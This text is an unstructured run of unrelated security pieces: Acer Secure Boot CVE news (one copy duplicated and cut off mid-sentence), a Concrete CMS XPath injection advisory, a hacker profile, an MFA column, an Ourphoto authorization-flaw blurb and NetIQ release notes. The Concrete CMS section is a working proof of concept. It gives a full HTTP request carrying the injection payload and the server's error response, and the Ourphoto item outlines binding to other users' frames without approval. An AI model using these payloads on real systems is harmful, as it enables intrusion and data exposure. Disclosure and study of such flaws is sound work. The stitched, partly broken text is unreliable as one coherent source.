Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.

Tracked as **CVE-2022-4020**, the high-severity vulnerability affects five different models that consist of Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G.

The PC maker described the vulnerability as an issue that "may allow changes to Secure Boot settings by creating NVRAM variables." Credited with discovering the flaw is ESET researcher Martin Smolár, who previously disclosed similar bugs in Lenovo computers.

Disabling Secure Boot, an integrity mechanism that guarantees that only trusted software is loaded during system startup, enables a malicious actor to tamper with boot loaders, leading to severe consequences.

This includes granting the attacker complete control over the operating system loading process as well as "disable or bypass protections to silently deploy their own payloads with the system privileges."

Per the Slovak cybersecurity company, the flaw resides in a DXE driver called HQSwSmiDxe.

The BIOS update is expected to be released as part of a critical Windows update. Alternatively, users can download the fixes from Acer's Support portal.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Flaw in Acer Laptops Could Let Attackers Disable Secure Boot Protection

Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.
Tracked as CVE-2022-4020, the high-severity vulnerability affects five different models that consist of Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G.

The PC maker described the vulnerability as

Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.

Tracked as **CVE-2022-4020**, the high-severity vulnerability affects five different models that consist of Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G.

The PC maker described the vulnerability as an issue that "may allow changes to Secure Boot settings by creating NVRAM variables." Credited with discovering the flaw is ESET researcher Martin Smolár, who previously disclosed similar bugs in Lenovo computers.

Disabling Secure Boot, an integrity mechanism that guarantees that only trusted software is loaded during system startup, enables a malicious actor to tamper with boot loaders, leading to severe consequences.

This includes granting the attacker complete control over the operating system loading process as well as "disable or bypass protections to silently deploy their own payloads with the system privileges."

Per the Slovak cybersecurity company, the flaw resides in a DXE driver called HQSwSmiDxe.

The BIOS update is expected to be released as part of a critical Windows update. Alternatively, users can download the fixes from Acer's Support portal.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

The manufacturer is working to fix a vulnerability — similar to a previous problem in Lenovo laptops — that allows threat actors to modify or disable Secure Boot settings to load malware.

Acer is working to fix a firmware flaw affecting five of its laptop models. An exploit could allow attackers to disable a machine's Secure Boot settings to bypass key security measures and load malware, researchers have found.

ESET Research researcher Martin Smolar discovered the flaw, tracked as CVE-2022-4020, in the HQSwSmiDxe DXE driver on some versions of consumer Acer Aspire and Extensa notebooks. An attacker with elevated privileges can use the flaw to modify UEFI Secure Boot settings via an NVRAM variable, ESET disclosed in a series of tweets posted Nov. 28.

"#CVE-2022-4020 is found in the DXE driver HQSwSmiDxe, which checks for the 'BootOrderSecureBootDisable' NVRAM variable," according to ESET. "If the variable exists, the driver disables Secure Boot."

Secure Boot is a security feature of the Unified Extensible Firmware Interface (UEFI) 2.3.1 designed to detect tampering with boot loaders, OS files, and unauthorized option ROMs by validating their digital signatures. The feature blocks any malicious activity before it can infect the system.

By exploiting the flaw, threat actors can bypass this feature and run whatever code they want on the machine, malware or otherwise, even achieving persistence in a case in which an OS is reinstalled, the researchers said.

**Different Manufacturer, Similar Security Vulnerability**

Specifically, CVE-2020-4020 affects Acer Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G notebooks. The flaw creates a similar opportunity for attackers to the one caused by vulnerabilities tracked as CVE-2022-3430, CVE-2022-3431, and CVE-2022-3432 that ESET researchers found in early November in various Lenovo Yoga IdeaPad and ThinkBook devices, and subsequently detailed extensively in a series of tweets.

As in that case, ESET also reported the vulnerability to the computer manufacturer for remediation. Acer quickly responded on Nov. 29 with a security update corroborating Smolar's findings and stressing the serious nature of the flaw.

"By disabling the Secure Boot feature, an attacker can load their own unsigned malicious bootloader to allow absolute control over the OS loading process," the company said. "This can allow them to disable or bypass protections to silently deploy their own payloads with the system privileges."

Acer is working on a BIOS update to resolve the issue that it will post on the Acer Support site, and recommends that affected users update their BIOS, once available, to the latest version to resolve the problem. The patch also will be included as a critical Windows update, the company said.

**Common NVRAM Variable Problem**

In both the Lenovo and Acer scenarios, attackers can exploit the Acer bug by creating special NVRAM variables, the actual value of which is not important—the existence of the variable itself is the only thing an affected firmware driver checks, the researchers noted.

NVRAM variables define a name for the boot option that can be displayed to a user. The variable also contains a pointer to the hardware device and to a file on that hardware device that contains the UEFI image to be loaded.

This problem appears to be quite well known, with researchers already advising against firmware developers storing security-sensitive components in these variables. Firmware security engineer Nikolaj Schlej even tweeted a plea to firmware developers in October to "stop using common NVRAM as trusted storage" because of the security problem it poses.

"It is indeed really tempting to use NVRAM or CMOS SRAM for storing triggers for various things, but both need to be assumed being under full attacker control," he said in a response to his own tweet. "Even volatile NVRAM variables aren't completely safe because there is still a chance of incorrect attribute check."

In the case of the Lenovo flaws, it does appear that developers already were aware of the issue before it made its way into the company's laptops, as some of the affected components were only meant to be used during manufacturing and were mistakenly included in production, according to ESET.

Acer Firmware Flaw Lets Attackers Bypass Key Security Feature

With AlphaBay shuttered, Operation Bayonet enters its final phase: driving the site’s refugees into a giant trap. But one refugee hatched his own plan.

The Hunt for the Kingpin Behind AlphaBay, Part 6: Endgame

Beverage of Choice: Krating Daeng (Thai Red Bull)
Industry Influencer he Admires: Casey John Ellis
What did you want to be when you grew up? A physician and nearly did
Hobbies (Present & Past): Motorcycling & Australian Football
Bucket List: Continuing to discover new software
Fun Fact: He currently has 2,000 tabs open

**Beverage of Choice:** _Krating Daeng_ (_Thai Red Bull_)

**Industry Influencer he Admires:** Casey John Ellis

**What did you want to be when you grew up?** A physician and nearly did

**Hobbies (Present & Past):** Motorcycling & Australian Football

**Bucket List:** Continuing to discover new software

**Fun Fact:** He currently has 2,000 tabs open

> “People keep saying to me, ‘nah this is impossible…’. Then I’ll go do it anyway and be like alright, it’s actually possible.”

Roaring through the streets of Thailand helmetless on his motorcycle wearing nothing but shorts and sandals is the perfect depiction of the controlled chaos that is Sick Codes. Sick is an electric factory; his energy is unmatched and won’t go unnoticed. A man who is defined by living life on the edge, thinking outside of the box and some mighty impressive hacking!

It all began in Australia where he grew up. In the 3rd grade he got his hands on the classroom computer and proceeded to install the original Soldier of Fortune and other adult rated games, hiding them within thousands of folders to evade deletion. His inability to follow the rules got him banned from using the class computer, and such bans became a trend for Sick.

Fast forward to high school where he was up against a lifetime ban from eBay. Unphased and agitated, he stood up his own online stores and carried about his business, on his own. A rude awakening came his way in the form of “some nation state cyber army” carding at checkout on his stores, having one of his hundreds of sites defaced as a result. This would be the beginning of Sick’s security trajectory. For him, the silver lining of getting hacked was a fire that ignited in him, a burning desire to uncover how things happen the way they do. This curiosity was now permanently engrained in his being, always reading between the lines, inspecting all software he uses, and rejecting the notion that something is impossible. The curiosity was so strong, Sick now devotes significant time discovering zero-day vulnerabilities in many software projects, including several Microsoft Azure Open-Source projects.

If you’ve met the man, you would never expect he wanted to pursue a relatively tame career path as an aspiring medical professional. However, unpredictable by nature, Sick seeks out excitement and prefers to live on the edge, or slightly over it. Roughly 10 years ago Sick left his home country for the rest of the World. He says he’s been to around 40 countries now, and his time in Sur America was his favorite, but also the furthest thing from tame, more like a blur of hedonism mixed with getting really, really good at code, computers, and attacking both of those. While wild, it was also formidable for his hacking career having committed 10-18 hours a day, sometimes up to 30 hours straight, racking up vulnerabilities and beginning to master the art of “cyber-warfare”. Apart from offensive cyber security, he was also able to learn Spanish.

Wishing to remain anonymous and seemingly never in one place, it was about time his work put him on the map. Sick said the turning point in his career was when the acting secretary for Homeland Security gave him a ‘shout out’ for discovering large security holes in the Android TV manufacturer, TCL. The vulnerabilities he discovered in 2020 on the Android Smart TVs made him a mainstay, wreaking havoc in the field of security research.

Sick admittedly was not exactly an angel growing up, however he has now, “changed his ways” for the better. He now only performs good faith security research and is an approachable ethical hacker that provides resources for those who, like him, are also acting “in good faith”. Moreover, Sick helps co-maintain a Repositor_y of Legal Threats Against Security Researchers on GitHub_ with the goal of educating organizations on the benefits (and harsh realities) of ethical hacking, while helping researchers stay on the right side of the law. While a bit of a rebel, people respect his work and he’s built a vast community to show for it.

Sick has what he describes as an innate obligation to show others the ropes, having once been reliant on free software. Now he is a stern advocate for free software and a well-rounded coder, with very large GitHub following, and throughout the security research community. His Docker-OSX open-source project on GitHub has nearly 25,000 stars, over 400,000 downloads, and he personally maintains another 20+ packages, with thousands of contributions, and counting. His influence continues on Twitter and Discord where he keeps other researchers on the edge of their seats awaiting his next major breakthrough and thousands of followers in the loop about his package updates, project developments, feedback, and support.

Not listening to others when told how to be or what to do, Sick embodies the mindset of a hacker. With some style points and a devilish grin on his face he is motivated to expose anything that isn’t right in the research space, targeting the most highly used products and industries. If your local McDonalds soft-serve machine is out of service, you may have a bone to pick with Sick. Microsoft made his hit list as well, and he is quickly moving up the MSRC 2022 Most Valuable Researcher (MVR) Azure Leaderboard with at least five valid vulnerability reports submitted in the past year, and achieving Top 10 positions for Azure Cloud security, which he says he is very proud of. The contributions don’t actually stop there, with dozens of newsworthy findings showcased on his website, and plenty more to come knowing Sick.

Speaking of… Sick stole the show at this year’s DefCon with his viral tractor hack. In his most notable exploit and demo yet, he broke into a widely used agricultural touch screen terminal, gaining root access, and eventually crafting a crude jailbreak that went absolutely viral. To top that off, he reconfigured the console to run a modified tractor-themed version of the 90’s shooter game Doom. His passion is pushing computers to their limits, and there’s no denying that going against the grain was the right path for Sick. While the tables have turned, some things just never change.

A Ride on the Wild Side with Hacking Heavyweight Sick Codes

Don’t fuss now — just another spoonful of multifactor authentication to keep the organization strong and the data safer.

Don’t fuss now — just another spoonful of multifactor authentication to keep the organization strong and the data safer.

Like it or not, vegetables are good for us. They reduce our risk of chronic diseases and deliver the vitamins our bodies need. And yet, the CDC reports that only 10% of American adults eat enough veggies — even though they likely know they should. Companies are the same when it comes to security.

There are 921 password attacks every second — almost double what we saw a year ago. Basic security hygiene like multifactor authentication (MFA) can protect against 98% of attacks, but 38% of large companies and 62% of small to midsize companies don’t do it. Enabling MFA adds another layer of protection to prevent threat actors from accessing internal networks. But if strengthening a company’s cybersecurity posture is as easy as enabling MFA, it begs the question: Why won’t companies eat their vegetables?

**What’s Stopping Companies From Enabling MFA?**

Although every enterprise is different, there are a few common trends when it comes to the reasons they don’t deploy MFA.

*   **MFA costs too much:** Security team resources are already limited, so adding an additional tool to their portfolio can be a tough sell. Luckily, some security providers offer MFA for free as part of their security defaults. Security defaults were created to make managing security a little easier. The goal is to ensure that all organizations have at least a basic level of security enabled at no extra cost.
*   **They think their users will hate MFA:** Users want to be productive wherever and whenever they are working without sacrificing their organization’s security. Conditional access is one modern approach to MFA. Instead of prompting a user for a second factor every time they authenticate, security programs can look at several different elements to determine if something has changed or is unusual about this user before prompting them. It looks at things like where the user is signing in from, whether their device is healthy, and if there’s any suspicious behavior — for example, if the user typically signs in from France and someone tries to sign in with their credentials from Seattle at the same time, something is definitely wrong.
    
    End users can also choose how they want to supply the second factor when they do get a prompt. No fancy equipment is required. Users can choose something as simple as an SMS message or phone call, though we recommend stronger authentication methods like an app or specific security key. They can even have multiple devices that use different methods for different environments and have backup devices in case they lose one or forget one at home.
    
    **MFA’s Too Hard to Deploy**
    
    Another reason enterprises give for not implementing MFA is that it’s too difficult to deploy. However, organizations can leverage conditional access policies to protect cloud implementations, as opposed to relying on a physical server or software.
    
    We’ve recently added conditional access templates to make configuring the policies even easier. Security teams can quickly create a new policy from any of the 14 built-in templates. They help companies provide maximum protection for their users and devices and align with the most commonly used policies. These include things like “Require multifactor authentication for admin,” or “Require password change for high-risk users.” Cloud service providers often offer a list of recommended policies, and organizations can target conditional access policies to a specific set of users, apps or devices to easily deploy different policies at scale.
    
    Ultimately, an enterprise must be able to protect its own operations, and its users, from ongoing cybersecurity threats. And enabling MFA is just one tool in a security team’s kit.
    

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Editors' Choice

Jeffrey Schwartz, Contributing Writer, Dark Reading

Tara Seals, Managing Editor, News, Dark Reading

Elizabeth Montalbano, Contributor, Dark Reading

Dark Reading Staff, Dark Reading

Webinars

*   How to Protect Your Legacy Software Applications
*   Developing and Testing an Effective Breach Response Plan
*   Cloud Security Essentials
*   Seeing Your Attack Surface Through the Eyes of an Adversary
*   Security Considerations for Working with Cloud Services Providers

Reports

*   How Machine Learning, AI & Deep Learning Improve Cybersecurity
*   Implementing Zero Trust In Your Enterprise: How to Get Started
*   2021 Data Breach Investigations Report (DBIR)
*   Cloud & Hybrid Security Tooling Report
*   Future Proofing Your Network for 5G

White Papers

*   How Machine Learning, AI & Deep Learning Improve Cybersecurity
*   Ransomware Resilience and Response: The Next-Generation
*   Ransomware Is On The Rise
*   How Hybrid Work Fuels Ransomware Attacks
*   Implementing Zero Trust In Your Enterprise: How to Get Started

Events

*   Cybersecurity Outlook 2023 - December 13 Event
*   Black Hat Europe - December 5-8 - Learn More
*   \[FREE Virtual Event\] The Identity Crisis

Is MFA the Vegetable of Cybersecurity?

The /device/acceptBind end-point for Ourphoto App version 1.4.1 does not require authentication or authorization. The user_token header is not implemented or present on this end-point. An attacker can send a request to bind their account to any users picture frame, then send a POST request to accept their own bind request, without the end-users approval or interaction.

CVE-2022-24190: Automating Unsolicited Richard Pics; Pwning 60,000 Digital Picture Frames

This update resolves a multi-factor authentication bypass attack

This release includes the following software fixes:

Component

Description

Administration Portal

The data and graphs displayed on the Dashboard are not up to date. The data and graph are displayed until the date when the settings are last saved. However, the data gets updated when the administrator manually updates the .

Administration Portal

Specifying color in the RGB format or keeping the following fields empty in the policy results in an error message:

Therefore, you must set the colors in the Hexadecimal format.

Administration Portal

The column is removed from the widget of Dashboard, as it does not provide clear details about the expiry status of a specific license and causes confusion.

Administration Portal

The full synchronization process marks several active users for deletion. Due to this issue, active users cannot log in. This issue occurs after upgrading to Advanced Authentication 6.3 Service Pack 4 Patch 1 release.

Administration Portal

Use of special characters in the ClientID and Secret of OAuth events causes the Web Authentication parsing error.

Administration Portal

The customized brand settings break after upgrading to Advanced Authentication 6.4. This issue occurs due to the missing custom branding JAR file.

Administration Portal

Implementing the Per Tenant Hostname (PTH) feature breaks the Web Authentication method.

Administration Portal

The administrator is unable to remove the LDAP repository when the LDAP server is unavailable. The following error message is displayed:

Cannot connect to the LDAP server

Administration Portal

The existing OAuth integrations fail after the upgrade to Advanced Authentication 6.4.

Administration Portal

When the name and number of a particular Server Metric tile are too long, then the content that is extending outside the tile is wrapped that misaligns the tile position.

Administration Portal

On the Linux PAM Client, the is not formatted properly.

Appliance

Deleting the reports from the Administration Portal does not delete the exported reports (CSV and JSON) in the /var/lib/docker/volumes/aaf\_aucore-data/\_data/reports path even after rebooting the appliance.

Appliance

The upgrade of Web Servers to Advanced Authentication 6.4 fail in the cluster environment.

CAF Portal

The upgrade to Advanced Authentication 6.4 fails if the connection is via proxy.

CAF Portal

In Advanced Authentication 6.4, exporting of the Digital Certificate results in an error.

Enrollment Portal

After integrating Advanced Authentication with Access Manager using the SAML event, the redirection from Access Manager to the Enrollment Portal fails and results in a 404 error. This happens due to the missing text webauth/ in the Callback URL.

Enrollment Portal

The enrollment of the Web Authentication Method fails even when the administrator has configured the method with valid details.

Linux PAM Client

When a user selects an authentication chain with the Fingerprint method on the Linux PAM client, an error message Invalid access: cannot convert empty value is displayed.

Now, if the Fingerprint reader is not connected to the Linux machine and user attempts to log in, the authentication chain with the Fingerprint method is not displayed.

OAuth and SAML Events

The SAML Service Provider method with improper configuration bypasses authentication and grants access without any validation to the associated OAuth and SAML events.

Old Enrollment Portal

On the old Enrollment Portal, enrollment of the U2F method fails when using the Chrome browser.

SAML Event

When Advanced Authentication and Cisco AnyConnect are integrated using the SAML event, the login page is not displayed appropriately.

Web Authentication

With one Web Authentication event active for a user and the user tries to log in to another Web Authentication event, an error message stating to log out from the previous event is displayed.

Web Authentication

An authentication attempt to the Web Authentication event fails if the is set with RGB values in the policy. This occurs due to the use of transparent colors. Therefore, administrators must set the colors in the Hexadecimal format.

Windows Client

When users try to authenticate to Windows Client using the FIDO2 method with NFC capability, an invalid error message Please connect a FIDO2 token is displayed though the reader is connected to the system.

Windows Client

An invalid error message is displayed when a user removes the NFC-supported card from the card reader while authenticating to Windows Client using the Card method.

Now, the following message is displayed when the user removes NFC supported card from the reader during authentication:

Tap your security key again on the reader

CVE-2022-38753: Advanced Authentication 6.4 Service Pack 1 Release Notes

April 2021

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes enhancements and resolves several previous issues.

Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure that our products meet all your needs. You can post feedback in the Advanced Authentication forum on NetIQ Communities, our online community that also includes product information, blogs, and links to helpful resources. You can also post or vote the ideas of enhancement requests in the Ideas forum.

For more information about this release and for the latest release notes, see the Documentation NetIQ Advanced Authentication Documentation page.

If you have suggestions for documentation improvements, click at the bottom of the specific page in the HTML version of the documentation posted at the NetIQ Advanced Authentication Documentation page.

**1.0 What’s New?**

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes the following:

*   Enhancements
    
*   Security Improvements
    
*   Software Fixes
    

**1.1 Enhancements**

This release includes the following enhancements:

Enhancement

Description

Settings to Retrieve User Groups after Authentication

The options, and are introduced in all events (existing and new events). These options allow an administrator to retrieve the list of groups a user is associated with after successfully authenticating to an event.

_NOTE:_The is enabled by default for all the events except the Authenticators Management, Smartphone Enrollment, OAuth 2.0, and SAML 2.0 events.

For more information, see Configuring an Existing Event in the Advanced Authentication - Administration guide.

Improved REST API Call to Return the DNS Name

The REST API call /api/v1/repositories has been enhanced to return the DNS name of each repository along with the repository name and repository type.

**1.2 Security Improvements**

Advanced Authentication 6.3 Service Pack 4 Patch 1 resolves a potential Multi-Factor Authentication (MFA) downgrade issue (CVE-2021-22515).

We would like to offer a special thanks to Julkair for responsibly disclosing this issue.

**1.3 Software Fixes**

This release includes the following fixes:

Component

Description

Enrollment Portal

The option for the SMS OTP and Email OTP methods is not available in the old Enrollment portal.

Enrollment Portal

When a user logs in to the old Enrollment portal by performing the basic authentication and tries to enroll the TOTP method, the QR code is not displayed.

Enrollment Portal

When a user connects the Spanish national identity card (Documento Nacional de identidad) and tries to enroll it using the PKI method, the certificate is not displayed in the field.

However, on click of , certificates are displayed. When the user selects a certificate, the following error message is displayed:

Cannot check the revocation status.

RADIUS

The RADIUS server does not return the msRADIUSFramedIPAddress attribute if the hexadecimal value of that attribute contains a negative value.

Web Authentication

When the users from LDAP repositories try to log in to the Enrollment Portal, the following error message is displayed:

WebAuth feature is not running.

This issue happens only for LDAP users who are associated with many groups and many nested groups. The local users can log in without any problem.

**2.0 Known Issues**

NetIQ Corporation strives to ensure our products provide quality solutions for your enterprise software needs. The following issues are currently being researched. If you need further assistance with any issue, please contact Technical Support.

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes the following known issue:

*   Windows Client Does Not Respond
    
*   Syslog is Flooded with the Health Check Messages
    
*   Issue with Risk Service After Upgrade
    

**2.1 Windows Client Does Not Respond**

When a user tries to authenticate to Windows Client, it freezes in the Please wait screen after providing the username. This happens only in Windows machines with external Nvidia Quadro graphics cards and their drivers installed.

**2.2 Syslog is Flooded with the Health Check Messages**

There are various messages as follows:

dockerd\[2167\]: time="2020-12-21T23:30:22.663706880Z" level=warning msg="Health check for container b1cc02cc52d3fe2681c9fa60abfab62aa54fa40d4d833fca4bb0fef5d0414890 error: context deadline exceeded" in syslog.

These messages do not indicate any issues. This is due to the absence of the Risk Service license.

_Workaround:_ Perform the following steps:

1.  Log in to the Configuration Portal (:9443).
    
2.  Click and select the Risk Service then click and select .
    
3.  Click then select for Risk Service.
    

**2.3 Issue with Risk Service After Upgrade**

_Issue:_ The Risk Service does not work after upgrading to Advanced Authentication 6.3 SP4.

_Workaround:_ Run the following commands to remove the old rba\_history container and reboot the appliance:

1.  systemctl stop docker
    
2.  systemctl start docker
    
3.  docker container stop risk\_rbahistory\_1
    
4.  docker container rm risk\_rbahistory\_1
    
5.  docker rmi -f mfsecurity/rba\_history:1.0.0.2
    
6.  reboot
    
7.  Log in to the Administration portal and click > to clear the logs.
    

_NOTE:_If any command takes too long to respond or hangs, press Ctrl+C to stop and continue with the next step.

**4.0 Contact Information**

Our goal is to provide documentation that meets your needs. If you have suggestions for improvements, please email Documentation-Feedback@netiq.com. We value your input and look forward to hearing from you.

For detailed contact information, see the Support Contact Information website.

For general corporate and product information, see the NetIQ Corporate website.

For interactive conversations with your peers and NetIQ experts, become an active member of our community. The NetIQ online community provides product information, useful links to helpful resources, blogs, and social media channels.

**5.0 Legal Notice**

For information about legal notices, trademarks, disclaimers, warranties, export and other use restrictions, U.S. Government rights, patent policy, and FIPS compliance, see http://www.microfocus.com/about/legal/.

© Copyright 2021 NetIQ Corporation, a Micro Focus company. All Rights Reserved.

Tag

#mac